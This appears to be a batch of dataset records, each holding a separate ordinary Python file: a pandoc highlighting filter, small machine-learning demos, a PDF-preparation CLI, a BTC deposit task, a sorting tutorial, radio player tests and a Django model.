+{"seq_id":"583010916","text":"#!/usr/bin/env python\n\"\"\"\nPandoc filter to pass all code blocks through pygments highlighter.\n\"\"\"\n__app_name__ = \"pandocfilter-pygments\"\n\nfrom pandocfilters import toJSONFilter, RawBlock\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name, guess_lexer, TextLexer\nfrom pygments.formatters import get_formatter_by_name\n\ndef pygmentize(key, value, format, meta):\n if key == 'CodeBlock':\n [[ident, classes, keyvals], code] = value\n\n lexer = None\n for klass in classes:\n if klass == \"commonlisp\":\n klass = \"lisp\"\n try:\n lexer = get_lexer_by_name(klass)\n break\n except:\n pass\n\n if lexer is None:\n try:\n lexer = guess_lexer(code)\n except:\n lexer = TextLexer()\n\n if format == \"html5\":\n format = \"html\"\n\n if format == \"html\":\n formatter = get_formatter_by_name(format) \\\n .__class__(cssclass=\"highlight \" + klass)\n else:\n formatter = get_formatter_by_name(format)\n\n return RawBlock(format, highlight(code, lexer, formatter))\n\n\ndef cli():\n toJSONFilter(pygmentize)\n","sub_path":"src/pandocfilter_pygments/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"634761866","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import svm\nimport random\nfrom sklearn import linear_model\nfrom sklearn import neighbors\nimport matplotlib.pyplot as plt\n\n# create dictionaries to go from number <-> type and tier -> number\nrandom.seed(7089278395)\ntypes = ['Steel', 'Fairy', 'Dragon', 'Bug', 'Electric', 'Fire', 'Grass', 'Rock', 'Dark', 'Flying', 'Ground', 'Poison', 'Normal', 'Fighting', 'Ghost', 'Ice', 'Psychic', 'Water']\ndtypes = {types[i]:i for i in range(len(types))}\ntiers = ['CAP', 'LC', 'Untiered', 'PU', 'PUBL', 'NU', 'NUBL', 'RU', 'RUBL', 'UU', 'UUBL', 'OU', 'Uber', 'AG']\ndtiers = {tiers[i]:(10*(i-2)) for i in range(len(tiers))}\nnum_to_tier = {(10*(i-2)):tiers[i] for i in range(len(tiers))}\n\n# read in the data\ndf = pd.read_csv('pokemonstats.csv')\n#for t in ['Untiered', 'PU', 'NU', 'RU', 'UU', 'OU', 'Uber']:\n#\tprint('There are %i Pokemon in %s' %(sum(df['tier']==dtiers[t]), t))\n#print('------------------------')\n\n# clean out certain parts of the data\ndf = df.loc[df['tier'] >= 0]\t\t\t# excludes CAP and LC\ndf = df.loc[df['is_nfe'] == 0]\t\t\t# excludes NFE mons\ndf = df.loc[df['tier'] > 0]\t\t\t# excludes Untiered mons\n\n# the names of the pokemon\nnames = np.array(df['name'])\n\n# turn the data into a NumPy array and separate into training and testing\ndata = np.array(df)\ntrain_idxs = np.array(random.sample(range(len(data)), int(0.9*len(data))))\t# train on 90 % of the data\ntest_idxs = np.array([i for i in range(len(data)) if i not in train_idxs])\n\ntrain_X = np.array(data[train_idxs, 1:-1], dtype = float)\ntrain_y = np.array(data[train_idxs, -1], dtype = float)\ntest_X = np.array(data[test_idxs, 1:-1], dtype = float)\ntest_y = np.array(data[test_idxs, -1], dtype = float)\n\n# uncomment these lines to only include certain parts of the data\n# only use BST\n#train_X, test_X = [arr[:,:6] for arr in [train_X, test_X]]\n\n# only use atk, spa, spe\n#train_X, test_X = [arr[:,[1, 3, 5]] for arr in [train_X, test_X]]\n\n# use 4 different fitting models to compare accuracy\nx = 2638952\nmodels = [svm.LinearSVC(random_state=x, max_iter=1e5), \n\t linear_model.Lasso(random_state=x, alpha=0.1), \n\t neighbors.KNeighborsClassifier(n_neighbors=5, weights='distance'),\n\t svm.SVR(kernel='linear')]\ntitles = ['Linear Classification', 'Lasso Regression', 'K-Neighbors Classification', 'Linear Regression']\n\n# train & test the models\n# plot the deviations from the correct values of each model\nfig = plt.figure()\nfig.add_subplot(111, frameon=False)\nplt.tick_params(labelcolor='none', top=False, bottom=False, left=False, right=False)\nplt.xlabel('Error', fontsize = 16)\nplt.ylabel('Density', fontsize = 16)\nfor i in range(len(titles)):\n\tax = fig.add_subplot(2, 2, i+1)\n\tclf = models[i]\n\tclf.fit(train_X, train_y)\n\tpredict_y = clf.predict(test_X)\n\tdiff = test_y - predict_y\n\tax.hist(diff, histtype = 'step', bins = 15, density=True)#, label = titles[i])\n\tax.set_title(titles[i])\n\n\tcloseness = 20\n\tnright = sum(abs(predict_y-test_y)<=closeness)\n\tprint('%s predicted with %.1f percent accuracy' %(titles[i], nright/len(predict_y)*100))\n\nplt.tight_layout()\nplt.show()\n","sub_path":"learn.py","file_name":"learn.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"401152939","text":"#! /usr/bin/env python\n\"\"\"CLI interface for manual preparation of PDFs\"\"\"\nfrom __future__ import annotations\n\nimport os\nimport platform\nimport re\nimport subprocess\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\nimport zope.interface\nfrom dataclasses_jsonschema import JsonSchemaMixin\n\nimport colrev.env.package_manager\nimport colrev.exceptions as colrev_exceptions\nimport colrev.record\nimport colrev.ui_cli.cli_colors as colors\n\nif False: # pylint: disable=using-constant-test\n from typing import TYPE_CHECKING\n\n if TYPE_CHECKING:\n import colrev.ops.pdf_prep_man\n\n\n# pylint: disable=too-few-public-methods\n\n\n@zope.interface.implementer(\n colrev.env.package_manager.PDFPrepManPackageEndpointInterface\n)\n@dataclass\nclass CoLRevCLIPDFManPrep(JsonSchemaMixin):\n \"\"\"Manually prepare PDFs based on a CLI (not yet implemented)\"\"\"\n\n settings_class = colrev.env.package_manager.DefaultSettings\n ci_supported: bool = False\n\n def __init__(\n self,\n *,\n pdf_prep_man_operation: colrev.ops.pdf_prep_man.PDFPrepMan, # pylint: disable=unused-argument\n settings: dict,\n ) -> None:\n self.settings = self.settings_class.load_settings(data=settings)\n\n def __update_metadata(\n self, *, record: colrev.record.Record\n ) -> colrev.record.Record:\n valid_selections = [\"a\", \"c\", \"t\", \"v\", \"n\", \"p\", \"s\"]\n user_selection = \"\"\n print(\n \"Update metadata fields: \"\n \"(a)uthor, (c)ontainer title, (t)itle, (v)olume, (n)umber, (p)ages or (s)ave\"\n )\n while user_selection not in valid_selections:\n user_selection = input(\"Selection: \")\n\n if \"s\" == user_selection:\n break\n if \"a\" == user_selection:\n author = input(\"Authors:\")\n record.update_field(\n key=\"author\", value=author, source=\"manual_correction\"\n )\n elif \"c\" == user_selection:\n if \"journal\" in record.data:\n journal = input(\"Journal:\")\n record.update_field(\n key=\"journal\", value=journal, source=\"manual_correction\"\n )\n if \"booktitle\" in record.data:\n booktitle = input(\"Booktitle:\")\n record.update_field(\n key=\"booktitle\", value=booktitle, source=\"manual_correction\"\n )\n elif \"t\" == user_selection:\n title = input(\"Title:\")\n record.update_field(\n key=\"title\", value=title, source=\"manual_correction\"\n )\n elif \"v\" == user_selection:\n volume = input(\"Volume:\")\n record.update_field(\n key=\"volume\", value=volume, source=\"manual_correction\"\n )\n elif \"n\" == user_selection:\n number = input(\"Number:\")\n record.update_field(\n key=\"number\", value=number, source=\"manual_correction\"\n )\n elif \"p\" == user_selection:\n pages = input(\"Pages:\")\n record.update_field(\n key=\"pages\", value=pages, source=\"manual_correction\"\n )\n user_selection = \"\"\n\n return record\n\n def pdf_prep_man(\n self, pdf_prep_man_operation: colrev.ops.pdf_prep_man.PDFPrepMan, records: dict\n ) -> dict:\n \"\"\"Prepare PDF manually based on a cli\"\"\"\n\n # pylint: disable=too-many-statements\n to_skip = 0\n\n def man_pdf_prep(\n pdf_prep_man: colrev.ops.pdf_prep_man.PDFPrepMan,\n records: dict,\n item: dict,\n stat: str,\n ) -> dict:\n # pylint: disable=no-member\n # pylint: disable=too-many-branches\n # pylint: disable=too-many-locals\n\n current_platform = platform.system()\n if current_platform in [\"Linux\", \"Darwin\"]:\n os.system(\"clear\")\n else:\n os.system(\"cls\")\n\n print(stat)\n record = colrev.record.Record(data=item)\n record.print_pdf_prep_man()\n\n record_dict = records[item[\"ID\"]]\n record = 
colrev.record.Record(data=record_dict)\n if (\n colrev.record.RecordState.pdf_needs_manual_preparation\n != record_dict[\"colrev_status\"]\n ):\n return record_dict\n\n file_provenance = record.get_field_provenance(key=\"file\")\n print(\n \"Manual preparation needed:\"\n f\" {colors.RED}{file_provenance['note']}{colors.END}\"\n )\n\n filepath = pdf_prep_man.review_manager.path / Path(record_dict[\"file\"])\n if not filepath.is_file():\n filepath = (\n pdf_prep_man.review_manager.pdf_dir / f\"{record_dict['ID']}.pdf\"\n )\n record.data.update(\n colrev_pdf_id=record.get_colrev_pdf_id(\n review_manager=pdf_prep_man.review_manager, pdf_path=filepath\n )\n )\n if filepath.is_file():\n current_platform = platform.system()\n if current_platform == \"Linux\":\n subprocess.call([\"xdg-open\", filepath])\n else:\n os.startfile(filepath) # type: ignore\n\n # if PDF > 100 pages, we may check on which page we find the title & print\n\n intro_paragraph = (\n \"Prepared?\\n\"\n \" (y)es, \\n\"\n \" (n)o/delete file,\\n\"\n \" (s)kip, (s10) to skip 10 records, or (q)uit,\\n\"\n \" (c)overpage remove, (l)ast page remove, (r)emove page range, \"\n \"(m)etadata needs to be updated\\n\"\n )\n print(intro_paragraph)\n user_selection = \"\"\n valid_selections = [\"y\", \"n\", \"s\", \"q\"]\n while user_selection not in valid_selections:\n user_selection = input(\"Selection: \")\n if user_selection.startswith(\"s\"):\n if user_selection[1:].isdigit():\n nonlocal to_skip\n to_skip = int(user_selection[1:])\n return records\n if \"q\" == user_selection:\n raise QuitPressedException()\n\n if \"m\" == user_selection:\n self.__update_metadata(record=record)\n print(intro_paragraph)\n elif \"c\" == user_selection:\n try:\n pdf_prep_man_operation.extract_coverpage(filepath=filepath)\n except colrev_exceptions.InvalidPDFException:\n pass\n elif \"l\" == user_selection:\n try:\n pdf_prep_man_operation.extract_lastpage(filepath=filepath)\n except colrev_exceptions.InvalidPDFException:\n pass\n elif \"r\" == user_selection:\n range_str = \"\"\n while not re.match(r\"(\\d)+-(\\d)+\", range_str):\n range_str = input('Page range to remove (e.g., \"0-10\"):')\n\n pages_to_exclude = list(\n range(\n int(range_str[: range_str.find(\"-\")]),\n int(range_str[range_str.find(\"-\") + 1 :]),\n )\n )\n try:\n pdf_prep_man_operation.extract_pages(\n filepath=filepath, pages_to_remove=pages_to_exclude\n )\n except colrev_exceptions.InvalidPDFException:\n pass\n\n elif \"y\" == user_selection:\n pdf_prep_man_operation.set_pdf_man_prepared(record=record)\n elif \"n\" == user_selection:\n record.remove_field(key=\"file\")\n record.set_status(\n target_state=colrev.record.RecordState.pdf_needs_manual_retrieval\n )\n if filepath.is_file():\n filepath.unlink()\n else:\n print(\"Invalid selection.\")\n\n else:\n print(f'File does not exist ({record.data[\"ID\"]})')\n\n pdf_prep_man.review_manager.dataset.save_records_dict(records=records)\n\n return records\n\n pdf_prep_man_operation.review_manager.logger.info(\n \"Loading data for pdf_prep_man\"\n )\n pdf_prep_man_data = pdf_prep_man_operation.get_data()\n records = pdf_prep_man_operation.review_manager.dataset.load_records_dict()\n\n for i, item in enumerate(pdf_prep_man_data[\"items\"]):\n if to_skip > 0:\n to_skip -= 1\n continue\n try:\n stat = str(i + 1) + \"/\" + str(pdf_prep_man_data[\"nr_tasks\"])\n records = man_pdf_prep(pdf_prep_man_operation, records, item, stat)\n except QuitPressedException:\n break\n\n 
pdf_prep_man_operation.review_manager.dataset.save_records_dict(records=records)\n pdf_prep_man_operation.review_manager.dataset.add_record_changes()\n\n if pdf_prep_man_operation.pdfs_prepared_manually():\n if \"y\" == input(\"Create commit (y/n)?\"):\n pdf_prep_man_operation.review_manager.create_commit(\n msg=\"Prepare PDFs manually\",\n manual_author=True,\n )\n else:\n pdf_prep_man_operation.review_manager.logger.info(\n \"Prepare PDFs manually. Afterwards, use colrev pdf-get-man\"\n )\n\n return records\n\n\nclass QuitPressedException(Exception):\n \"\"\"Quit-pressed exception\"\"\"\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"colrev/ops/built_in/pdf_prep_man/pdf_prep_man_cli.py","file_name":"pdf_prep_man_cli.py","file_ext":"py","file_size_in_byte":10279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"593845122","text":"# -*- coding: utf-8 -*-\n# Ren Zhang @ ryanzjlib@gmail.com\n\nfrom __future__ import print_function\nfrom __future__ import division\n\n# library\nimport numpy as np\nimport pandas as pd\nfrom sklearn.datasets import load_iris\nfrom sklearn.tree import DecisionTreeClassifier, export_graphviz\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.externals.six import StringIO\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nimport pydot # make sure you have GraphViz installed and added to Path, see http://www.graphviz.org/Download_windows.php\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\n\n# set up plot style\nsns.set(style=\"whitegrid\")\nplt.rcParams[\"figure.figsize\"] = (16, 9)\n\n# load data\ndata = load_iris()\nX = data.data\ny = data.target\n\n# fit and plot CART trees on different random samples\nrandom_seeds = [1106, 2014, 1998, 36]\n\nfor random_seed in random_seeds:\n print(\"\\n random seed for split the dataset is: {}\".format(random_seed))\n # split dataset\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = random_seed)\n\n # fit a CART tree using information gain as criterial for split\n clf = DecisionTreeClassifier(\n criterion = \"entropy\"\n )\n clf.fit(X_train, y_train)\n\n # generate plot of the tree\n dot_data = StringIO() \n export_graphviz(\n clf, \n out_file = dot_data,\n feature_names = data.feature_names,\n class_names = data.target_names, \n filled=True, \n rounded=True, \n special_characters=True)\n graph = pydot.graph_from_dot_data(dot_data.getvalue())[0]\n graph.write_png(\"iris_dt_entropy_70_percent_train_seed_{}.png\".format(random_seed))\n\n # print out training error and testing error:\n print(\"training classification error is: {}\".format(1-accuracy_score(y_train, clf.predict(X_train))))\n print(\"test classification error is: {}\".format(1-accuracy_score(y_test, clf.predict(X_test))))\n\n# generate a plot\npdf = pd.DataFrame(X, columns = data.feature_names)\npdf[\"species\"] = [data.target_names[i] for i in y]\n\nfigure = sns.lmplot(\n x = 'petal length (cm)', \n y = 'petal width (cm)', \n data = pdf, \n hue = 'species', \n size = 5,\n fit_reg=False)\nfigure.savefig(\"colored_scatter_plot_iris.png\")\n\n\n# fit and plot CART trees on samples with unbalanced target variables\nclass_weights = [[22, 22, 44],\n [22, 44, 22],\n [44, 22, 22],\n [45, 15, 10],\n [15, 45, 10],\n [45, 15, 5],\n [15, 45, 5]]\n\n# set seed to make sure reproducibility\nnp.random.seed(36)\n\nfor class_weight in class_weights:\n # create unbalanced sample\n num_setosa, num_versicolor, num_virginica = class_weight\n setosa_indices = np.random.choice(range(50), size = num_setosa, replace = False)\n versicolor_indices = np.random.choice(range(50, 100), size = num_versicolor, replace = False)\n virginica_indices = np.random.choice(range(100, 150), size = num_virginica, replace = False)\n train_indices = np.concatenate([setosa_indices, versicolor_indices, virginica_indices])\n test_indices = [i for i in range(150) if i not in train_indices]\n y_train = y[train_indices]\n X_train = X[train_indices,:]\n y_test = y[test_indices]\n X_test = X[test_indices,:]\n # fit a CART tree using information gain as criterial for split\n clf = DecisionTreeClassifier(\n criterion = \"entropy\"\n )\n clf.fit(X_train, y_train)\n\n # generate plot of the tree\n dot_data = StringIO() \n export_graphviz(\n clf, \n out_file = dot_data,\n feature_names = data.feature_names,\n class_names = 
data.target_names, \n filled=True, \n rounded=True, \n special_characters=True)\n graph = pydot.graph_from_dot_data(dot_data.getvalue())[0]\n graph.write_png(\"iris_dt_entropy_num_per_class_{}_{}_{}.png\".format(num_setosa, num_versicolor, num_virginica))\n # print out training error and testing error:\n print(\"\\n setosa_{}_versicolor_{}_virginica_{}\".format(num_setosa, num_versicolor, num_virginica))\n print(\"training classification error is: {}\".format(1-accuracy_score(y_train, clf.predict(X_train))))\n print(\"test classification error is: {}\".format(1-accuracy_score(y_test, clf.predict(X_test)))) \n print(\"confusion matris is:\")\n ct = confusion_matrix(y_test, clf.predict(X_test))\n print(ct)\n print(\"classification error by target class is:\")\n ct_normalized = ct.astype('float') / ct.sum(axis=1)[:, np.newaxis]\n print(1-np.diag(ct_normalized))\n\n\n","sub_path":"MA710/decision_trees/iris_sklearn_dt_demo.py","file_name":"iris_sklearn_dt_demo.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"174947441","text":"import logging\nfrom datetime import timezone, datetime\nfrom decimal import Decimal\n\nfrom django.db.transaction import atomic\n\nfrom api.models import Account, Deposit, Symbol\nfrom crypto.btc import BTC\n\nfrom utils.redis_queue import NotificationsQueue\n\nfrom api.api import BalanceManagementMixin\n\nlogger = logging.getLogger('deposit')\n\n\ndef process_deposit():\n all_deposit_transactions = filter(lambda item: item['category'] == 'receive', BTC.get_transactions())\n symbol = Symbol.objects.get(name='btc')\n bm = BalanceManagementMixin()\n for tx in all_deposit_transactions:\n if tx['confirmations'] > 0 and not Deposit.objects.filter(tx_hash=tx['txid'], address=tx['address']).exists():\n account = Account.objects.filter(private_key=tx['address']).first()\n if account:\n with atomic():\n now = datetime.now(timezone.utc)\n dep = Deposit.objects.create(\n tx_hash=tx['txid'],\n user=account.user,\n created_at=now,\n confirmed_at=now,\n amount=tx['amount'],\n symbol=symbol,\n address=tx['address']\n )\n bm.add_balance(Decimal(tx['amount']), account.user, symbol)\n NotificationsQueue.put(\n {\n 'telegram_id': dep.user.telegram_id,\n 'type': 'deposit',\n 'amount': dep.amount,\n 'symbol': dep.symbol.name\n }\n )\n","sub_path":"trading_api/routines/tasks/crypto/btc/deposit.py","file_name":"deposit.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"413597981","text":"\"\"\"Automatically build a multiconformer residue\"\"\"\nimport numpy as np\nimport argparse\nimport logging\nimport os\nimport sys\nimport time\nfrom string import ascii_uppercase\nfrom . import Structure\nfrom .structure import residue_type\n\ndef parse_args():\n p = argparse.ArgumentParser(description=__doc__)\n p.add_argument(\"structure\", type=str,\n help=\"PDB-file containing structure.\")\n\n # Output options\n p.add_argument(\"-d\", \"--directory\", type=os.path.abspath, default='.',\n metavar=\"\", help=\"Directory to store results.\")\n p.add_argument(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"Be verbose.\")\n args = p.parse_args()\n\n return args\n\n\ndef main():\n args = parse_args()\n try:\n os.makedirs(args.directory)\n except OSError:\n pass\n\n structure = Structure.fromfile(args.structure).reorder()\n\n\n for residue in structure.extract('record',\"ATOM\").extract(\n 'resn', \"HOH\",\"!=\").residue_groups:\n altlocs = sorted(list(set(residue.altloc)))\n resi = residue.resi[0]\n chainid = residue.chain[0]\n tot_rmsd = 0.0\n numlocs = 0\n if len(altlocs) > 1:\n try:\n altlocs.remove('')\n except ValueError:\n pass\n for altloc in altlocs:\n conf1 = residue.extract('altloc',altloc)\n for altloc2 in altlocs:\n if altloc != altloc2:\n conf2 = residue.extract('altloc',altloc2)\n rmsd = conf1.rmsd(conf2)\n tot_rmsd += rmsd\n numlocs += 1\n if numlocs > 0:\n print(resi,chainid,round(tot_rmsd/numlocs,2),len(altlocs))\n else:\n print(resi,chainid,0.0,len(altlocs))\n","sub_path":"src/qfit/get_metrics.py","file_name":"get_metrics.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"91199615","text":"'''\n This module provides a insertion sort algorithm implementation\n'''\n\ndef insertion_sort(values):\n '''\n Sort values using the selection sort algorithm\n \n Insertion sort works by selecting each value from the list and insert them\n in their correct position by comparing them to all the element that are already\n sorted.\n '''\n for index, value in enumerate(values[1:], 1):\n # Select a value then palce it on its corret position\n while(index > 0 and values[index - 1] > value):\n values[index], values[index - 1] = values[index - 1], values[index]\n index -= 1\n \n \n \nif __name__ == \"__main__\":\n values = range(10)\n values.reverse()\n print (\"Before: {}\".format(values))\n insertion_sort(values)\n print (\"After: {}\".format(values))","sub_path":"sort_tutorial/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"535989738","text":"# -*- coding: utf-8 -*-\n\nimport Image\nimport tools\nimport os\n\nlogger = tools.get_logger(__name__)\n\nclass HandlingImage(object):\n \n def __init__(self,path,folder_out_title,last_index):\n self.path = path\n self.folder_out_title = folder_out_title\n self.last_index = last_index\n \n def execute(self,index):\n size_thumb = (160,120)\n size_light = (1024,768)\n image = Image.open(self.path)\n filename= str(self.last_index + index).zfill(5)\n image.save(os.path.join(self.folder_out_title,filename + \".jpg\"),\"JPEG\")\n image_light = image.copy()\n image_light.thumbnail(size_light,Image.ANTIALIAS)\n image_light.save(os.path.join(self.folder_out_title, filename+ \"_light.jpg\"),\n \"JPEG\")\n image_thumb = image.copy()\n image_thumb.thumbnail(size_thumb,Image.ANTIALIAS)\n image_thumb.save(os.path.join(self.folder_out_title, filename + \"_thumb.jpg\"),\n \"JPEG\")\n logger.info(u\"Média %s=>%s terminé avec succès\" % (self.path,filename))\n","sub_path":"handlingimage.py","file_name":"handlingimage.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"527908738","text":"#!/usr/bin/env python\nfrom time import sleep, time\nfrom json import loads\nfrom threading import Thread\nimport tty_radio.__main__\nfrom tty_radio.radio import Radio\nfrom tty_radio.stream import mpg_running\nfrom tty_radio.api import Server, Client\n\n\ndef test_obj(): # noqa\n r = Radio()\n print('%02d>>> r:%s' % (0, r))\n print('%02d>>> r.stations:%s' % (1, r.stations))\n assert r.play()[0] is None and not mpg_running()\n r.set('favs')\n print('%02d>>> r.station:%s' % (2, r.station))\n print('%02d>>> r._station:%s' % (3, r._station))\n print('%02d>>> r._station.streams:%s' % (4, r._station.streams))\n assert r.set('favs', 'BAGeL Radio')\n print('%02d>>> Playing' % 5)\n t1 = time()\n assert r.play()[1] is not None\n while r.song is None:\n sleep(1)\n print('%02d>>> Play 1 wait was %s' % (6, int(time() - t1)))\n assert mpg_running()\n print('%02d>>> r.song:%s' % (7, r.song))\n print('%02d>>> Pausing' % 8)\n t1 = time()\n r.pause()\n while not r.is_paused:\n sleep(1)\n print('%02d>>> Pause wait was %s' % (9, int(time() - t1)))\n assert not mpg_running()\n print('%02d>>> Playing' % 10)\n t1 = time()\n assert r.play()[1] is not None\n while r.song is None:\n sleep(1)\n print('%02d>>> Play 2 wait was %s' % (11, int(time() - t1)))\n assert mpg_running()\n print('%02d>>> Stopping' % 12)\n t1 = time()\n r.stop()\n while r.is_playing:\n sleep(1)\n assert not mpg_running()\n print('%02d>>> Stop wait was %s' % (13, int(time() - t1)))\n assert r.set('favs', 'WCPE Classical')\n print('%02d>>> r.stream:%s' % (14, r.stream))\n print('%02d>>> r._stream:%s' % (15, r._stream))\n print('%02d>>> Playing' % 16)\n t1 = time()\n assert r.play()[1] is not None and mpg_running()\n while r._stream.meta_name is None:\n sleep(1)\n print('%02d>>> Play 3 wait was %s' % (17, int(time() - t1)))\n assert r.play()[0] is None\n assert r.set('favs')\n assert r.set('favs', 'WCPE Classical')\n assert not r.set('favs', 'BAGeL Radio')\n print('%02d>>> Stopping' % 18)\n t1 = time()\n r.stop()\n while r.is_playing:\n sleep(1)\n assert not mpg_running()\n print('%02d>>> Stop wait was %s' % (19, int(time() - t1)))\n assert not r.set('ewqrewrwer')\n assert not r.set('favs', 'ewqrewrwer')\n\n\ndef test_api_serv(): # noqa\n r = Radio()\n s = Server('127.0.0.1', 7887, radio=r)\n r = s.index()\n print('%02d>>> s.index:%s' % (0, r))\n assert loads(r)['success']\n r = s.status()\n print('%02d>>> s.status:%s' % (1, r))\n assert loads(r)['success']\n r = s.stations()\n print('%02d>>> s.stations:%s' % (2, r))\n assert loads(r)['success']\n r = s.streams()\n print('%02d>>> s.streams:%s' % (3, r))\n assert loads(r)['success']\n r = s.streams('favs')\n print('%02d>>> s.streams(favs):%s' % (4, r))\n assert loads(r)['success']\n r = s.streams('ewqrewrwer')\n print('%02d>>> s.streams(ewqrewrwer):%s' % (5, r))\n assert not loads(r)['success']\n r = s.set('favs')\n print('%02d>>> s.set(favs):%s' % (6, r))\n assert loads(r)['success']\n r = s.set('ewqrewrwer')\n print('%02d>>> s.set(ewqrewrwer):%s' % (7, r))\n assert not loads(r)['success']\n r = s.set('favs', 'ewqrewrwer')\n print('%02d>>> s.set(favs,ewqrewrwer):%s' % (8, r))\n assert not loads(r)['success']\n r = s.set('favs', 'WCPE Classical')\n print('%02d>>> s.set(favs,WCPE Classical):%s' % (9, r))\n assert loads(r)['success']\n r = s.play()\n print('%02d>>> s.play:%s' % (10, r))\n assert loads(r)['success']\n sleep(10)\n r = s.play()\n print('%02d>>> double s.play:%s' % (11, r))\n assert not loads(r)['success']\n r = s.set('favs', 'BAGeL Radio')\n 
print('%02d>>> set during play s.set(favs,BAGeL Radio):%s' % (12, r))\n assert not loads(r)['success']\n r = s.pause()\n print('%02d>>> s.pause:%s' % (13, r))\n assert loads(r)['success']\n sleep(2)\n # double pause currently allowed\n # r = s.pause()\n # print('%02d>>> double s.pause:%s' % (14, r))\n # assert not loads(r)['success']:\n r = s.play()\n print('%02d>>> s.play:%s' % (14, r))\n assert loads(r)['success']\n sleep(10)\n r = s.status()\n print('%02d>>> s.status:%s' % (15, r))\n assert loads(r)['success']\n r = s.stop()\n print('%02d>>> s.stop:%s' % (16, r))\n assert loads(r)['success']\n r = s.stop()\n # double stop currently allowed\n # print('%02d>>> double s.stop:%s' % (17, r))\n # assert not loads(r)['success']\n\n\ndef test_api_client(): # noqa\n r = Radio()\n s = Server('127.0.0.1', 7887, radio=r)\n st = Thread(target=s.run)\n st.daemon = True\n st.start()\n sleep(1)\n c = Client('127.0.0.1', 7887)\n r = c.status()\n print('%02d>>> c.status:%s' % (0, r))\n assert r is not None\n r = c.stations()\n print('%02d>>> c.stations:%s' % (1, r))\n assert len(r) > 0\n print('%02d>>> c.streams' % 2)\n r = c.streams()\n assert len(r) > 0\n print('%02d>>> c.streams(favs):' % 3)\n r = c.streams('favs')\n assert len(r) > 0\n print('%02d>>> c.streams(ewqrewrwer):' % 4)\n r = c.streams('ewqrewrwer')\n assert len(r) == 0\n print('%02d>>> c.play(favs,ewqrewrwer)' % 5)\n r = c.play('favs', 'ewqrewrwer')\n assert not r\n r = c.play('favs', 'BAGeL Radio')\n print('%02d>>> c.play(favs,BAGeL Radio):%s' % (6, r))\n assert r\n sleep(10)\n r = c.pause()\n print('%02d>>> c.pause:%s' % (6, r))\n assert r\n r = c.stop()\n print('%02d>>> c.stop:%s' % (7, r))\n assert r\n sleep(2)\n r = c.play('favs', 'WCPE Classical')\n print('%02d>>> c.play(favs,WCPE Classical):%s' % (8, r))\n assert r\n sleep(10)\n r = c.status()\n print('%02d>>> c.status:%s' % (9, r))\n assert r is not None\n r = c.stop()\n print('%02d>>> c.stop():%s' % (10, r))\n assert r\n\n\ndef test_radio_config():\n \"\"\"Check that `radio config` docstring and actual default settings match\"\"\"\n tty_radio.__main__._config_from_docstr(\n tty_radio.__main__.config.__doc__,\n check_against_default=True)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"473364967","text":"from django.db import models\nfrom treebeard.mp_tree import MP_Node\n\nVALUE_TYPE_CHOICES = [\n ('', 'None'),\n ('AutoInt', 'Automaticly Assigned Integer'),\n ('AutoUUID', 'Automaticly Assigned UUID'),\n ('Boolean', 'Boolean'),\n ('Char', 'String'),\n ('Choice', 'List of Choices'),\n ('Credential', 'Credential'),\n ('Date', 'Date'),\n ('DateTime', 'Date and Time'),\n ('Email', 'Email'),\n ('File', 'File Upload Chooser'),\n ('Float', 'Float'),\n ('Image', 'Image Upload Chooser'),\n ('Integer', 'Integer'),\n ('GenericIPAddress', 'IP'),\n ('MultipleChoice', 'List of Choices with the ability to choose more than one'),\n ('MultipleInstance', 'List of Choices that you can have more than one of the same'),\n ('NullBoolean', 'True/False/None'),\n ('Regex', 'Regex'),\n ('Slug', 'Slug'),\n ('Time', 'Time'),\n ('URL', 'URL'),\n ('UserList', 'User List'),\n ('Password', 'Password'),\n ('YesNo', 'Yes/No')\n]\n\nclass ConfigItemAttribute(MP_Node):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=25)\n description = models.TextField(default='', blank=True)\n valueType = models.CharField(max_length=25, choices=VALUE_TYPE_CHOICES, blank=True, default='')\n valuePrompt = models.CharField(max_length=254, blank=True, default='')\n valueDefault = models.TextField(default='', blank=True)\n \n node_order_by = ['name']\n \n def __str__(self):\n return self.name","sub_path":"src/depo_cmdb/models/ConfigItemAttribute.py","file_name":"ConfigItemAttribute.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
